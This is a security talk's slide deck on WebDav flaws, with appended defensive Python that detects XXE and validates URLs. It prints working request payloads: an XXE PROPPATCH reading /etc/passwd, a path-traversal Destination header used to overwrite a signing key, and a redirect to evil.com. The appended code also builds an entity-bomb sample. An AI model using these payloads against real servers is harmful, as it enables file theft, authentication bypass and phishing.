What should a hacker know about WebDav?
Vulnerabilities in various WebDav implementations
Mikhail Egorov
Short BIO – Mikhail Egorov
▶ Application Security Engineer at Odin [ http://www.odin.com ]
▶ Security researcher and bug hunter
▶ Graduated from BMSTU with MSc. in Information Security [ IU8 ]
▶ Holds OSCP and CISSP certificates
▶ See my blog [ http://0ang3el.blogspot.com ]
WebDav is complex
▶ Many standards prescribe how to implement the various WebDav methods
RFC 4918, RFC 3253, RFC 3648, RFC 3744, RFC 5323, RFC 4437, RFC 5842
▶ Many WebDav methods
OPTIONS, TRACE, GET, HEAD, POST, PUT, DELETE, COPY, MOVE, PROPPATCH,
PROPFIND, MKCOL, LOCK, UNLOCK, SEARCH, BIND, UNBIND, REBIND,
MKREDIRECTREF, UPDATEREDIRECTREF, ORDERPATCH, ACL, REPORT
▶ Many different WebDav implementations
Generic approach
▶ Try various XXE attacks
▶ Issue OPTIONS requests and see which “interesting” methods the WebDav library supports
▶ Try the attacks that follow from the security considerations sections of the RFCs and from “common sense” for every “interesting” method
▶ Review the source code, if available, to find implementation flaws
WebDav XXE attacks
▶ Methods PROPPATCH, PROPFIND, LOCK, etc. accept XML as input
▶ Java implementations are especially vulnerable
Apache Jackrabbit WebDav XXE
▶ CVE-2015-1833 [ http://www.securityfocus.com/archive/1/535582 ]
▶ Exploit code [ https://www.exploit-db.com/exploits/37110/ ]
▶ Video PoC [ https://www.youtube.com/watch?v=Hg3AXoG89Gs ]
Milton WebDav XXE
▶ CVE-2015-7326 [ http://www.securityfocus.com/archive/1/536813 ]
cloudme.com XXE
▶ CloudMe is a secure European service that makes your life a little bit easier.
With CloudMe you don’t have to think twice about where your files are, they’re
always with you …
▶ https://webdav.cloudme.com is a vulnerable WebDav endpoint
Apache Sling OOXML parsing XXE
▶ Apache Tika OSGi bundle to parse documents
▶ Apache POI is used to parse OOXML documents
▶ Apache POI library XXE [ https://access.redhat.com/security/cve/CVE-2014-3529 ]
Apache Jackrabbit WebDav CSRF
▶ JCR-3909 [ https://issues.apache.org/jira/browse/JCR-3909 ]
▶ POST requests are allowed and treated as PUT
▶ There is Referer-based CSRF protection, but an empty Referer bypasses it
▶ Could be used to mount an XXE attack against systems on the internal network!
Exploiting WebDav XXE tricks
▶ Create a resource
PUT /resource HTTP/1.1
Hack
▶ Write the content of the file into a property of the resource with the PROPPATCH method
PROPPATCH /resource HTTP/1.1
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE propertyupdate [
<!ENTITY loot SYSTEM "file:///etc/passwd"> ]>
<D:propertyupdate xmlns:D="DAV:"><D:set><D:prop>
<a xmlns="http://this.is.xxe.baby">&loot;</a>
</D:prop></D:set></D:propertyupdate>
Exploiting WebDav XXE tricks
▶ Read back the property holding the file content with the PROPFIND method
PROPFIND /resource HTTP/1.1
<?xml version="1.0" encoding="UTF-8"?>
<propfind xmlns="DAV:"><prop>
<q:a xmlns:q="http://this.is.xxe.baby"/>
</prop></propfind>
Exploiting WebDav XXE tricks
▶ OOB XXE will work with any method that supports XML input
• When general external entities are prohibited
▶ SSRF attack will work with any method that supports XML input
• When only external DTDs are allowed
Milton WebDav AUTHN bypass
▶ Cookie AUTHN [ preferred method in Windows, from Win7 ]
• miltonUserUrl=/users/admin/;Path=/;Expires=Thu, 06-Mar-2014 20:55:23 GMT;Max-Age=31536000
• miltonUserUrlHash=0.884150694443924:9c74dc9fb62c2926c911ce07b5e7dcb2;Path=/;Expires=Thu, 06-Mar-2014 20:55:23 GMT;Max-Age=31536000;HttpOnly
▶ The cookie is signed using HMAC-SHA1
• The key is in the keys.txt file stored in the java.io.tmpdir directory
▶ Path traversal in the Destination header of MOVE and COPY requests
• http://127.0.0.1:8080/../../../../../../../../../../_DAV/HACK/tmp
• We can overwrite the keys.txt file
• After an app server restart we can craft valid cookies
Confluence WebDav DoS attack
▶ Based on Apache Jackrabbit WebDav code
▶ Supports the Depth: infinity header in PROPFIND requests
▶ Allows DOCTYPE declarations
A Billion Laughs-like attack is possible, although the number of entity expansions is limited [ 64000 ]
▶ A Xerces-J library version vulnerable to CVE-2013-4002 was in use
https://jira.atlassian.com/browse/CONF-37991
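A pre-parse gatekeeper for the XXE tricks above and for the Confluence Depth/entity-expansion case, added here as an example (Python; not code from the slides or from any of the WebDav libraries discussed): it inspects the raw request as text before any XML parser sees the body and reports DOCTYPE declarations, external DTDs and entities, parameter entities, entity-declaration counts above a threshold, and Depth: infinity on PROPFIND. The method list and the threshold are assumptions; the sample requests are constructed, one of them reproducing the deck's PROPPATCH payload.

```python
"""Pre-parse gatekeeper for WebDav XML request bodies.

Added example, not code from the slides or from any WebDav library: the request
is inspected as text before an XML parser ever sees it, so a parser with
insecure defaults (the deck's Java case) never gets to process a DOCTYPE.
"""
import re

# Methods the deck names as XML-bearing ("PROPPATCH, PROPFIND, LOCK, etc."),
# plus MKREDIRECTREF, which the deck shows with an XML body.  Assumed list.
XML_METHODS = {"PROPPATCH", "PROPFIND", "LOCK", "MKREDIRECTREF"}

# Assumed policy threshold: a legitimate client has no reason to declare many
# entities; the deck's Confluence case shows a parser limit of 64000
# expansions still leaves room for a DoS, so count declarations up front.
MAX_ENTITY_DECLS = 8

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# <!DOCTYPE name SYSTEM "uri">: external DTD fetch (SSRF even with entities off)
EXT_DTD_RE = re.compile(r"<!DOCTYPE\s+[\w.:-]+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)
# <!ENTITY [%] name value>; group 1 marks a parameter entity
ENTITY_RE = re.compile(r"<!ENTITY\s+(%\s*)?([\w.:-]+)\s+(.*?)>", re.IGNORECASE | re.DOTALL)
EXTERNAL_RE = re.compile(r"^\s*(SYSTEM|PUBLIC)\b", re.IGNORECASE)


def inspect_webdav_request(method, headers, body):
    """Return a sorted list of finding tags for one request; [] means clean."""
    findings = set()
    method = method.upper()
    hdrs = {k.lower(): v.strip() for k, v in headers.items()}

    # Depth: infinity on PROPFIND walks the whole tree; RFC 4918 lets servers refuse it.
    if method == "PROPFIND" and hdrs.get("depth", "").lower() == "infinity":
        findings.add("depth-infinity")

    if method in XML_METHODS and body:
        text = body.decode("utf-8", "replace") if isinstance(body, bytes) else body
        if DOCTYPE_RE.search(text):
            findings.add("doctype")            # no WebDav request needs a DTD
        if EXT_DTD_RE.search(text):
            findings.add("external-dtd")
        entities = ENTITY_RE.findall(text)
        for is_param, _name, value in entities:
            if is_param:
                findings.add("parameter-entity")   # building block of OOB XXE
            if EXTERNAL_RE.match(value):
                findings.add("external-entity")    # file:// or http:// fetched by the parser
        if len(entities) > MAX_ENTITY_DECLS:
            findings.add("entity-bomb")            # Billion Laughs shape
    return sorted(findings)


# --- constructed sample traffic -----------------------------------------------
# The deck's PROPPATCH trick, with straight quotes.
PROPPATCH_XXE = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE propertyupdate [
<!ENTITY loot SYSTEM "file:///etc/passwd"> ]>
<D:propertyupdate xmlns:D="DAV:"><D:set><D:prop>
<a xmlns="http://this.is.xxe.baby">&loot;</a>
</D:prop></D:set></D:propertyupdate>"""

# The deck's PROPFIND read-back: it carries no DTD and is clean by itself.
PROPFIND_CLEAN = """<?xml version="1.0" encoding="UTF-8"?>
<propfind xmlns="DAV:"><prop>
<q:a xmlns:q="http://this.is.xxe.baby"/>
</prop></propfind>"""

# External DTD only: the SSRF case the deck mentions.  Host is a placeholder.
PROPFIND_EXT_DTD = """<?xml version="1.0"?>
<!DOCTYPE propfind SYSTEM "http://dtd-host.invalid/propfind.dtd">
<propfind xmlns="DAV:"><allprop/></propfind>"""


def build_entity_bomb_sample(depth=10):
    """Constructed Billion Laughs shaped PROPFIND with `depth` entity declarations."""
    decls = ['<!ENTITY e0 "lol">']
    for i in range(1, depth):
        decls.append('<!ENTITY e%d "%s">' % (i, ("&e%d;" % (i - 1)) * 10))
    return ('<?xml version="1.0"?><!DOCTYPE propfind [%s]>'
            '<propfind xmlns="DAV:"><allprop/>&e%d;</propfind>' % ("".join(decls), depth - 1))


if __name__ == "__main__":
    for name, method, hdrs, body in [
        ("proppatch-xxe", "PROPPATCH", {}, PROPPATCH_XXE),
        ("propfind-depth-inf", "PROPFIND", {"Depth": "infinity"}, PROPFIND_CLEAN),
        ("propfind-ext-dtd", "PROPFIND", {"Depth": "1"}, PROPFIND_EXT_DTD),
        ("entity-bomb", "PROPFIND", {"Depth": "0"}, build_entity_bomb_sample()),
    ]:
        print(name, inspect_webdav_request(method, hdrs, body))
```

Any non-empty finding list is a reason to reject the request before it reaches the parser; the same checks fit a servlet filter or a reverse proxy in front of the WebDav endpoint.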
Yandex.Disk unvalidated redirect
▶ WebDav access to Yandex.Disk – http://webdav.yandex.ru
▶ Supports the MKREDIRECTREF request
▶ It is possible to create a resource that redirects the victim from Yandex.Disk to an arbitrary site
MKREDIRECTREF /good.txt HTTP/1.1
Host: webdav.yandex.ru
<?xml version="1.0" encoding="utf-8" ?>
<D:mkredirectref xmlns:D="DAV:">
<D:reftarget>
<D:href>http://evil.com</D:href>
</D:reftarget>
</D:mkredirectref>
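Server-side validation of the two client-supplied URLs behind the Milton traversal and the Yandex.Disk redirect, added here as an example (Python; not code from Milton, Yandex.Disk or the slides): a MOVE/COPY Destination header is rejected unless it names our own origin and resolves inside the DAV root without any "." or ".." segments, and a DAV:reftarget href is accepted only as a same-server path or an http(s) URL on an allow-list. The origin, DAV root and allow-list values are constructed.

```python
"""Validation of client-supplied URLs in WebDav requests.

Added example, not code from Milton, Yandex.Disk or the slides.  It covers the
two findings that come from trusting a URL the client sends:
  - the MOVE/COPY Destination header (Milton: "../" reaching keys.txt)
  - the DAV:reftarget href of MKREDIRECTREF (Yandex.Disk: redirect to any site)
"""
from urllib.parse import urlsplit, unquote

# Constructed deployment values; the origin matches the host in the deck's Milton example.
DEMO_ORIGIN = ("http", "127.0.0.1:8080")
DEMO_ROOT = "/dav"
DEMO_ALLOWED_HOSTS = {"webdav.example"}


def validate_destination(dest, dav_origin=DEMO_ORIGIN, dav_root=DEMO_ROOT):
    """Return the server path a MOVE/COPY may target, or None to reject.

    Traversal segments are refused outright rather than normalised away: a
    lexically "cleaned" path is exactly what let the deck's
    http://127.0.0.1:8080/../../../_DAV/HACK/tmp reach the filesystem.
    """
    parts = urlsplit(dest.strip())
    if parts.scheme or parts.netloc:
        # RFC 4918 allows an absolute Destination URI, but only our own origin.
        if (parts.scheme.lower(), parts.netloc.lower()) != dav_origin:
            return None
    path = unquote(parts.path)              # %2e%2e must be judged as ".."
    if not path.startswith("/") or "\x00" in path or "\\" in path:
        return None
    segments = path.split("/")[1:]
    if segments and segments[-1] == "":
        segments = segments[:-1]            # trailing slash names a collection
    if any(seg in ("", ".", "..") for seg in segments):
        return None
    norm = "/" + "/".join(segments)
    root = dav_root.rstrip("/")
    if norm != root and not norm.startswith(root + "/"):
        return None                         # lands outside the DAV root
    return norm


def validate_reftarget(href, allowed_hosts=DEMO_ALLOWED_HOSTS):
    """Accept a DAV:reftarget href only as a same-server absolute path or an
    http(s) URL whose host is on the allow-list."""
    parts = urlsplit(href.strip())
    if not parts.scheme and not parts.netloc:
        return parts.path.startswith("/")   # relative reference on this server
    if parts.scheme.lower() not in ("http", "https"):
        return False                        # javascript:, data:, file: and friends
    host = parts.hostname                   # userinfo tricks resolve to the real host
    return host is not None and host.lower() in allowed_hosts


if __name__ == "__main__":
    for dest in ("http://127.0.0.1:8080/../../../../../../../../../../_DAV/HACK/tmp",
                 "http://127.0.0.1:8080/dav/docs/report.txt",
                 "/dav/docs/%2e%2e/secret"):
        print("Destination", dest, "->", validate_destination(dest))
    for href in ("http://evil.com", "https://webdav.example/files/a.txt", "/files/a.txt"):
        print("reftarget", href, "->", validate_reftarget(href))
```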
Takeaways
▶ WebDav is a complex protocol, and it extends the attack surface of your system
▶ WebDav-related RFCs have security considerations sections; unfortunately, many WebDav implementations ignore them
▶ WebDav libraries in Java suffer from XXE issues because most XML parsers in Java are insecure in their default configuration
Questions?